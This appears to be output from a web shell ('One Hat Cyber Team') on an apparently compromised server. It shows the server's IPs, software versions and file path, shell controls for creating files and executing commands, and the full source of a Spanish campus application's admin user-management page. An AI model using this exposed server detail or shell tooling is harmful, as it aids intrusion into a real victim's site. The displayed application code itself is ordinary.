One Hat Cyber Team
Your IP :
104.23.197.102
Server IP :
104.21.51.23
Server :
Linux 128-201-239-36.cprapid.com 3.10.0-1160.41.1.el7.x86_64 #1 SMP Tue Aug 31 14:52:47 UTC 2021 x86_64
Server Software :
Apache
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
juscatamarca
/
www
/
campusjxj
/
public
/
admin
/
View File Name :
users.php
<?php declare(strict_types=1); require_once dirname(__DIR__, 2) . '/config/app.php'; require_once ROOT_PATH . '/helpers/functions.php'; require_once ROOT_PATH . '/helpers/auth.php'; require_once ROOT_PATH . '/helpers/admin_users.php'; require_role('admin'); $pageTitle = 'Usuarios'; $navbarTitle = 'Gestión de usuarios'; $currentPage = 'users'; $validRoles = ['admin', 'student']; $validStatuses = ['active', 'inactive', 'blocked']; $errors = []; $formData = [ 'id' => '0', 'full_name' => '', 'email' => '', 'role' => 'student', 'geographic_department_id' => '', 'status' => 'active', 'password' => '', ]; $flashSuccess = get_flash('success'); $flashError = get_flash('error'); $editId = (int) ($_GET['edit'] ?? 0); if ($editId > 0 && $_SERVER['REQUEST_METHOD'] !== 'POST') { $editingUser = get_admin_user_by_id($editId); if ($editingUser === null) { set_flash('error', 'El usuario seleccionado no existe.'); redirect('admin/users.php'); } $formData = [ 'id' => (string) ($editingUser['id'] ?? 0), 'full_name' => (string) ($editingUser['full_name'] ?? ''), 'email' => (string) ($editingUser['email'] ?? ''), 'role' => (string) ($editingUser['role'] ?? 'student'), 'geographic_department_id' => (string) ($editingUser['geographic_department_id'] ?? ''), 'status' => (string) ($editingUser['status'] ?? 'active'), 'password' => '', ]; } if ($_SERVER['REQUEST_METHOD'] === 'POST') { $action = (string) ($_POST['action'] ?? 'create'); $userId = (int) ($_POST['id'] ?? 0); if ($action === 'delete') { if ($userId <= 0 || !admin_user_exists($userId)) { set_flash('error', 'El usuario seleccionado no existe.'); redirect('admin/users.php'); } if ($userId === (int) (current_user()['id'] ?? 0)) { set_flash('error', 'No puedes eliminar tu propia cuenta.'); redirect('admin/users.php'); } try { delete_admin_user($userId); set_flash('success', 'Usuario eliminado correctamente.'); redirect('admin/users.php'); } catch (Throwable $e) { set_flash('error', 'No se pudo eliminar el usuario.'); redirect('admin/users.php'); } } $formData = [ 'id' => (string) $userId, 'full_name' => trim((string) ($_POST['full_name'] ?? '')), 'email' => strtolower(trim((string) ($_POST['email'] ?? ''))), 'role' => trim((string) ($_POST['role'] ?? 'student')), 'geographic_department_id' => trim((string) ($_POST['geographic_department_id'] ?? '')), 'status' => trim((string) ($_POST['status'] ?? 'active')), 'password' => trim((string) ($_POST['password'] ?? '')), ]; if ($formData['full_name'] === '') { $errors[] = 'El nombre del usuario es obligatorio.'; } if ($formData['email'] === '') { $errors[] = 'El correo electrónico es obligatorio.'; } elseif (!filter_var($formData['email'], FILTER_VALIDATE_EMAIL)) { $errors[] = 'El correo electrónico no tiene un formato válido.'; } if (!in_array($formData['role'], $validRoles, true)) { $errors[] = 'El rol seleccionado no es válido.'; } if (!in_array($formData['status'], $validStatuses, true)) { $errors[] = 'El estado seleccionado no es válido.'; } $isEditMode = (int) $formData['id'] > 0; if (!$isEditMode && $formData['password'] === '') { $errors[] = 'La contraseña es obligatoria para nuevos usuarios.'; } if (empty($errors) && admin_email_exists($formData['email'], $userId)) { $errors[] = 'Ya existe un usuario con este correo electrónico.'; } if (empty($errors)) { $payload = [ 'full_name' => $formData['full_name'], 'email' => $formData['email'], 'role' => $formData['role'], 'geographic_department_id' => $formData['geographic_department_id'], 'status' => $formData['status'], ]; if (!$isEditMode || $formData['password'] !== '') { $payload['password'] = $formData['password']; } try { if ($isEditMode) { update_admin_user($userId, $payload); set_flash('success', 'Usuario actualizado correctamente.'); } else { create_admin_user($payload); set_flash('success', 'Usuario creado correctamente.'); } redirect('admin/users.php'); } catch (Throwable $e) { $errors[] = 'No se pudo guardar el usuario en este momento.'; } } } $search = trim((string) ($_GET['q'] ?? '')); $roleFilter = trim((string) ($_GET['role'] ?? 'all')); $statusFilter = trim((string) ($_GET['status'] ?? 'all')); $roleParam = in_array($roleFilter, $validRoles, true) ? $roleFilter : null; $statusParam = in_array($statusFilter, $validStatuses, true) ? $statusFilter : null; $userRows = []; $listError = null; $geographicDepartments = []; try { $userRows = get_admin_users($search !== '' ? $search : null, $roleParam, $statusParam); $geographicDepartments = get_geographic_departments_for_select(); } catch (Throwable $e) { $listError = 'No se pudo cargar la información de usuarios.'; } $isEditMode = (int) $formData['id'] > 0; include ROOT_PATH . '/includes/layout/header.php'; ?> <?php include ROOT_PATH . '/includes/layout/sidebar_admin.php'; ?> <div class="main-panel"> <?php include ROOT_PATH . '/includes/layout/navbar.php'; ?> <main class="content-area"> <section class="hero-panel mb-4"> <div> <p class="hero-tag mb-2">Administración de Acceso</p> <h2 class="h3 fw-bold mb-2">Gestión de Usuarios</h2> <p class="mb-0 text-muted">Crear, editar y administrar cuentas de administradores y estudiantes.</p> </div> </section> <?php if ($flashSuccess): ?> <div class="alert alert-success" role="alert"><?= e($flashSuccess) ?></div> <?php endif; ?> <?php if ($flashError): ?> <div class="alert alert-danger" role="alert"><?= e($flashError) ?></div> <?php endif; ?> <?php if (!empty($errors)): ?> <div class="alert alert-danger" role="alert"> <strong>Revisa el formulario:</strong> <ul class="mb-0 mt-2"> <?php foreach ($errors as $error): ?> <li><?= e($error) ?></li> <?php endforeach; ?> </ul> </div> <?php endif; ?> <div class="card card-campus mb-4"> <div class="card-header-campus"> <h3 class="h6 mb-0"><?= $isEditMode ? 'Editar usuario' : 'Nuevo usuario' ?></h3> <?php if ($isEditMode): ?> <a href="<?= e(base_url('admin/users.php')) ?>" class="btn btn-sm btn-outline-success">Cancelar edición</a> <?php endif; ?> </div> <div class="card-body"> <form class="row g-3" method="post" novalidate> <input type="hidden" name="action" value="<?= $isEditMode ? 'update' : 'create' ?>"> <input type="hidden" name="id" value="<?= e($formData['id']) ?>"> <div class="col-md-6"> <label class="form-label">Nombre completo</label> <input type="text" class="form-control" name="full_name" maxlength="255" required value="<?= e($formData['full_name']) ?>" placeholder="Ej: Juan García"> </div> <div class="col-md-6"> <label class="form-label">Correo electrónico</label> <input type="email" class="form-control" name="email" maxlength="255" required value="<?= e($formData['email']) ?>" placeholder="usuario@campus.local"> </div> <div class="col-md-4"> <label class="form-label">Rol</label> <select class="form-select" name="role" required> <option value="student" <?= $formData['role'] === 'student' ? 'selected' : '' ?>>Estudiante</option> <option value="admin" <?= $formData['role'] === 'admin' ? 'selected' : '' ?>>Administrador</option> </select> </div> <div class="col-md-4"> <label class="form-label">Departamento (estudiantes)</label> <select class="form-select" name="geographic_department_id"> <option value="">Sin asignar</option> <?php foreach ($geographicDepartments as $dept): ?> <option value="<?= e((string) $dept['id']) ?>" <?= (string) $formData['geographic_department_id'] === (string) $dept['id'] ? 'selected' : '' ?>> <?= e((string) $dept['name']) ?> </option> <?php endforeach; ?> </select> </div> <div class="col-md-4"> <label class="form-label">Estado</label> <select class="form-select" name="status" required> <option value="active" <?= $formData['status'] === 'active' ? 'selected' : '' ?>>Activo</option> <option value="inactive" <?= $formData['status'] === 'inactive' ? 'selected' : '' ?>>Inactivo</option> <option value="blocked" <?= $formData['status'] === 'blocked' ? 'selected' : '' ?>>Bloqueado</option> </select> </div> <div class="col-md-6"> <label class="form-label"><?= $isEditMode ? 'Contraseña (dejar en blanco para no cambiar)' : 'Contraseña' ?></label> <input type="password" class="form-control" name="password" <?= !$isEditMode ? 'required' : '' ?> placeholder="Contraseña temporal"> <?php if ($isEditMode): ?> <small class="text-muted d-block mt-1">Solo completa si deseas cambiar la contraseña.</small> <?php endif; ?> </div> <div class="col-12 text-end"> <button type="submit" class="btn btn-campus"> <i class="fa-solid fa-floppy-disk me-1"></i><?= $isEditMode ? 'Actualizar usuario' : 'Crear usuario' ?> </button> </div> </form> </div> </div> <div class="card card-campus"> <div class="card-header-campus"> <h3 class="h6 mb-0">Listado de usuarios</h3> </div> <div class="card-body border-bottom"> <form method="get" class="row g-2 align-items-end"> <div class="col-12 col-md-5"> <label class="form-label mb-1">Buscar</label> <input type="text" class="form-control" name="q" value="<?= e($search) ?>" placeholder="Nombre o correo electrónico"> </div> <div class="col-12 col-md-3"> <label class="form-label mb-1">Rol</label> <select class="form-select" name="role"> <option value="all" <?= $roleFilter === 'all' ? 'selected' : '' ?>>Todos</option> <option value="admin" <?= $roleFilter === 'admin' ? 'selected' : '' ?>>Administrador</option> <option value="student" <?= $roleFilter === 'student' ? 'selected' : '' ?>>Estudiante</option> </select> </div> <div class="col-12 col-md-2"> <label class="form-label mb-1">Estado</label> <select class="form-select" name="status"> <option value="all" <?= $statusFilter === 'all' ? 'selected' : '' ?>>Todos</option> <option value="active" <?= $statusFilter === 'active' ? 'selected' : '' ?>>Activo</option> <option value="inactive" <?= $statusFilter === 'inactive' ? 'selected' : '' ?>>Inactivo</option> <option value="blocked" <?= $statusFilter === 'blocked' ? 'selected' : '' ?>>Bloqueado</option> </select> </div> <div class="col-12 col-md-2 d-flex gap-2"> <button type="submit" class="btn btn-campus flex-grow-1">Filtrar</button> <a href="<?= e(base_url('admin/users.php')) ?>" class="btn btn-outline-success">Limpiar</a> </div> </form> </div> <?php if ($listError !== null): ?> <div class="card-body"> <div class="alert alert-danger mb-0" role="alert"><?= e($listError) ?></div> </div> <?php elseif (empty($userRows)): ?> <div class="card-body text-center py-5"> <i class="fa-solid fa-inbox mb-3" style="font-size: 2rem; color: var(--campus-gray-500); opacity: 0.5"></i> <p class="mb-0 text-muted">No hay usuarios para los filtros seleccionados.</p> </div> <?php else: ?> <div class="table-responsive"> <table class="table align-middle mb-0"> <thead> <tr> <th>Nombre</th> <th>Correo electrónico</th> <th>Rol</th> <th>Departamento</th> <th>Estado</th> <th class="text-end">Acciones</th> </tr> </thead> <tbody> <?php foreach ($userRows as $user): ?> <?php $roleBadge = admin_user_role_badge((string) ($user['role'] ?? '')); $statusBadge = admin_user_status_badge((string) ($user['status'] ?? '')); ?> <tr> <td><?= e((string) ($user['full_name'] ?? '')) ?></td> <td><?= e((string) ($user['email'] ?? '')) ?></td> <td><span class="badge <?= e($roleBadge['class']) ?>"><?= e($roleBadge['label']) ?></span></td> <td><?= e((string) ($user['geographic_department_name'] ?? 'Sin asignar')) ?></td> <td><span class="badge <?= e($statusBadge['class']) ?>"><?= e($statusBadge['label']) ?></span></td> <td class="text-end"> <a href="<?= e(base_url('admin/users.php?edit=' . (int) $user['id'])) ?>" class="btn btn-sm btn-outline-success"> <i class="fa-solid fa-pen-to-square me-1"></i>Editar </a> <form method="post" style="display: inline;" onsubmit="return confirm('¿Estás seguro de que deseas eliminar este usuario? Esta acción no se puede deshacer.');"> <input type="hidden" name="action" value="delete"> <input type="hidden" name="id" value="<?= (int) $user['id'] ?>"> <button type="submit" class="btn btn-sm btn-outline-danger"> <i class="fa-solid fa-trash me-1"></i>Eliminar </button> </form> </td> </tr> <?php endforeach; ?> </tbody> </table> </div> <?php endif; ?> </div> </main> </div> <?php include ROOT_PATH . '/includes/layout/footer.php'; ?>